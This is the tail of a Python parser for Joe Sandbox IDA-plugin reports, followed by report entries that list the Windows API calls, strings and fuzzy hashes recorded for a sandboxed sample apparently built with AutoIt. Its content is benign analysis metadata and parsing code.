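• Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
• Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
• Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
• Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
"""

# One API line: optional "Part of subcall function <addr>:" prefix, Name.MODULE,
# optional "(args)", then "ref: <call-site address>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s?(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LAST_FIELD = "Instruction Fuzzy Hash"  # last line of every entry on the page


@dataclass
class ApiCall:
    name: str
    module: str
    args: Optional[str]   # raw argument text, None when the line has no parentheses
    ref: str              # call-site address as printed
    parent: Optional[str] = None  # address from a "Part of subcall function" prefix


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, List[str]] = field(default_factory=dict)  # "• Key: value" lines outside APIs
    complete: bool = False  # True once the closing Instruction Fuzzy Hash line was seen

    def first(self, key: str) -> Optional[str]:
        vals = self.meta.get(key)
        return vals[0] if vals else None

    def string_ids(self) -> List[str]:
        # The page joins the function's referenced strings with '$'.
        return [s for s in (self.first("String ID") or "").split("$") if s]

    def calls(self, name: str) -> List[ApiCall]:
        return [c for c in self.apis if c.name == name]


def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur, section = FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"], m["ref"].upper(), m["parent"]))
                continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m["key"].strip(), m["value"].strip()
            cur.meta.setdefault(key, []).append(value)
            if key == LAST_FIELD:  # entry boundary
                cur.complete = True
                entries.append(cur)
                cur, section = FunctionEntry(), None
    if cur.apis or cur.meta:  # trailing entry cut off by extraction: keep, but flagged incomplete
        entries.append(cur)
    return entries


def index_by(entries: List[FunctionEntry], key: str) -> Dict[str, List[FunctionEntry]]:
    """Group entries by one Similarity field, e.g. "Opcode Fuzzy Hash", for cross-report matching."""
    idx: Dict[str, List[FunctionEntry]] = {}
    for e in entries:
        v = e.first(key)
        if v:
            idx.setdefault(v, []).append(e)
    return idx


def entries_calling(entries: List[FunctionEntry], api_name: str) -> List[FunctionEntry]:
    return [e for e in entries if e.calls(api_name)]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.first("Opcode Fuzzy Hash"), [c.name for c in e.apis], e.string_ids())
```

Pointing `parse_entries` at a whole extracted report lets you ask which functions touch a given API (`entries_calling(ents, "CreateWindowExW")`) or look up an Opcode Fuzzy Hash taken from another sample's report via `index_by`; an entry cut off at the end of the text comes back with `complete=False` so it is not mistaken for a full match.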
APIs
• GetSysColor.USER32 ref: 0044A11D
• GetClientRect.USER32(?,?), ref: 0044A18D
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
• GetWindowDC.USER32(?), ref: 0044A1B3
• GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
• ReleaseDC.USER32(?,00000000), ref: 0044A1D6
• GetSysColor.USER32(0000000F), ref: 0044A1EC
• GetWindowLongW.USER32(?,000000F0), ref: 0044A207
• GetSysColor.USER32(0000000F), ref: 0044A216
• GetSysColor.USER32(00000005), ref: 0044A21E
• GetWindowDC.USER32 ref: 0044A277
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
• GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1744303182-0
                                                                                                                                    • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                    • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                                    • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                    • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                    • API String ID: 790654849-1810252412
                                                                                                                                    • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                    • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                                    • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                    • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                    • API String ID: 0-1896584978
                                                                                                                                    • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                    • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                                                                    • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                    • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitVariant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                    • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                    • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                                    • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                    • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                                    • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                                    • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                                    • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                                    • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                                    • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                    • API String ID: 1322021666-1919597938
                                                                                                                                    • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                    • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                                    • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                    • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                                    APIs
                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                                                    • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                                                    • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                                                    • _wcscpy.LIBCMT ref: 0045E019
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 3201719729-438819550
                                                                                                                                    • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                                    • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                                                    • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                                    • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
• Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
• Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
APIs
• CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
• GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
• strncnt.LIBCMT ref: 00428646
• strncnt.LIBCMT ref: 0042865A
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: strncnt$CompareErrorLastString
• String ID:
• API String ID: 1776594460-0
• Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
• Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
• Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
APIs
• LoadIconW.USER32(?,00000063), ref: 004545DA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
• SetWindowTextW.USER32(?,?), ref: 00454606
• GetDlgItem.USER32(?,000003EA), ref: 0045461F
• SetWindowTextW.USER32(00000000,?), ref: 00454626
• GetDlgItem.USER32(?,000003E9), ref: 00454637
• SetWindowTextW.USER32(00000000,?), ref: 0045463E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
• GetWindowRect.USER32(?,?), ref: 00454688
• SetWindowTextW.USER32(?,?), ref: 004546FD
• GetDesktopWindow.USER32 ref: 00454708
• GetWindowRect.USER32(00000000), ref: 0045470F
• MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
• GetClientRect.USER32(?,?), ref: 0045476F
• PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
• SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
• Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
• Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
• LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
• LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
• LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
• LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
• LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
• LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
• LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
• LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
• LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
• LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
• LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
• LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
• LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
• LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
• LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
• GetCursorInfo.USER32 ref: 00458E03
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
• Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
• Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
• Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
• GetFocus.USER32 ref: 004696E0
• GetDlgCtrlID.USER32(00000000), ref: 004696EB
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
• Opcode ID: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
• Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
• Opcode Fuzzy Hash: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
• Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
APIs
• _memset.LIBCMT ref: 00468107
• GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
• GetMenuItemCount.USER32(?), ref: 00468227
• DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
• DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
• DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
• DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
• GetMenuItemCount.USER32 ref: 004682DC
• SetMenuItemInfoW.USER32 ref: 00468317
• GetCursorPos.USER32(00000000), ref: 00468322
• SetForegroundWindow.USER32(?), ref: 0046832D
• TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID: 0
• API String ID: 3993528054-4108050209
• Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
• Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
• Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
• Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
• _wcscat.LIBCMT ref: 0046F3BC
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
• SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
• DragFinish.SHELL32(?), ref: 0046F414
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
